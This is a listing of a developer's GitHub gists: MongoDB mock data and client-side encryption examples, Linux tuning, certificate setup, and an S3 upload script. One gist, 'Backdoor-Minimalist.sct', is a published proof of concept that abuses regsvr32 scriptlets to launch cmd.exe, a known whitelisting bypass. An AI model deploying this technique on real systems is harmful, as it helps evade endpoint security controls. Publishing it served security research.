@kennwhite
kennwhite / merkel.json
Created January 16, 2023 18:15
Mock records for testing subdocuments and extended json EJSON-style dates (this is all fake data)
[{
"name": "Angela Merkel",
"dob": {
"$date": {
"$numberLong": "-487900800000"
}
},
"phone": "+49 30 182722720",
"address": {
"street": "Willy-Brandt-Straße 1",
kennwhite / ulimits_ubuntu_mongodb.sh
Last active December 21, 2022 23:17
Set Ubuntu 20.04 mongodb recommended ulimits
# ulimit -a
# sudo sysctl net.ipv4.tcp_fastopen=3
# sudo sysctl vm.max_map_count=524288
# note: "-l" (max locked memory) has no soft limit
# apt-get install numactl
sudo sh -c "sysctl -w net.ipv4.tcp_fastopen=3 ; \
sysctl -w vm.max_map_count=524288 ; \
ulimit -l unlimited ; \
kennwhite / sublimeRegExp1.txt
Last active December 17, 2022 04:15
Sublime regexp for find & replace
Regular expression for Sublime to find & replace and add double quotes
"$numberLong": 706213333988
to
"$numberLong": "706213333988"
Use this (make sure the [.*] button on the left is pressed)
Find: \$numberLong": (.*)
kennwhite / javascript_node_random_dob.js
Created December 9, 2022 04:04
Javascript/Node function to generate a random date set to UTC 00:00:00 timestamp
// Create a native Javascript Date object set to UTC 00:00:00 timestamp
// Here, the default parameters create a plausible DOB
function randomDate( start = new Date(1935, 0, 1), end = new Date(2004, 0, 1) ) {
var dt = new Date(+start + Math.random() * (end - start));
dt.setUTCHours(0,0,0,0);
return dt;
}
// Random DOB
kennwhite / crostini_self-signed_certs.sh
Last active October 2, 2022 11:41
Create valid self-signed certificates with SAN to use in a Chrome OS VM container that are trustable by Chrome & Firefox
#!/bin/bash
# This should be executed in a folder in your Linux Files namespace
# You can move these later, but you'll need to reference the files in nginx/apache later
# I chose: /home/kenn/nginx_tmp but /etc/nginx/xxx or /etc/ssl/xxx is probably better
# Just make sure to verify/chown to nginx-readable perms
# Generate RSA signing keys for RSA certs
# openssl genrsa -out rootCA.key 4096
# openssl genrsa -out server.key 4096
kennwhite / csfle_explicit_hello_world.go
Last active September 5, 2022 21:24
CSFLE explicit encryption golang Hello World example
/*
CSFLE explicit encryption golang Hello World example
brew install mongodb/brew/libmongocrypt
go get go.mongodb.org/mongo-driver/mongo
go get go.mongodb.org/mongo-driver/bson
go get go.mongodb.org/mongo-driver/mongo/options
go get go.mongodb.org/mongo-driver/mongo/readpref
kennwhite / Backdoor-Minimalist.sct
Created April 21, 2016 22:55
Execute Remote Scripts Via regsvr32.exe
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
kennwhite / neckbeard-push.sh
Last active May 17, 2022 12:32
Minimalist, bash-only utility script to push a file to S3 bucket. AWS ID & Key can be passed via environment or on command line. Only dependency is openssl tools (usually default). Name is an homage to Joe Stump.
#!/usr/bin/env bash
#
# Upload a file to the Amazon S3 service
# Usage:
# neckbeard-push FILE S3_BUCKET [-a ACL_POLICY] [-i AWS_ACCESS_ID] [-k AWS_SECRET_KEY] [-d debug] [-l write verbose session log]
# Note: If option -l is requested, curl_session.log contains SSL handshake *and* plaintext AWS keys
#
# Ex 1: neckbeard-push foo.log my-bucket -a public-read (with env vars: $AWS_ACCESS_ID & $AWS_SECRET_KEY)
# Ex 2: neckbeard-push foo.log my-bucket -a private -i AKIXXXXX -k aBcDeFgHxxx -d
#
kennwhite / mongodb-csfle-example-kmip-or-local-key.md
Created April 18, 2022 20:51 — forked from pkdone/mongodb-csfle-example-kmip-or-local-key.md
MongoDB CSFLE example using mongosh with a master key sourced from KMIP or a local file

MongoDB Client-Side Field Level Encryption (CSFLE) Using KMIP or Local Master Key (with mongosh)

Assumptions

  • You have a MongoDB deployment already running and accessible (self-managed or in Atlas)
  • You have the modern MongoDB Shell (mongosh) installed locally on your workstation
  • You have a KMIP Server running and accessible, if you don't intend to use a local keyfile (for an example of running and configuring a Hashicorp Vault development instance, see: Hashicorp Vault Configuration For MongoDB KMIP Use)

Configure Local Workstation Context Files

kennwhite / client_side_fle_quickstart-part-1.md
Last active April 18, 2022 18:08
MongoDB Client-Side Field Level Encryption Quickstart Part 1

Client-Side Field Level Encryption Quickstart Part 1

Note: See KMS Best Practices guide for more specific guidance:

You should work to ensure that the corresponding key policies follow a model of least privilege. This includes ensuring that you do NOT include kms:* permissions in an IAM policy.

Note: This tutorial will create both an AWS KMS master key as well as a local key. If planning to use only a local key, skip to Step 4.

1. Create a project-specific Master Key

  • In the AWS management console, create a project-specific master key:
  • Key Management Service (KMS) / Customer managed keys / Create a key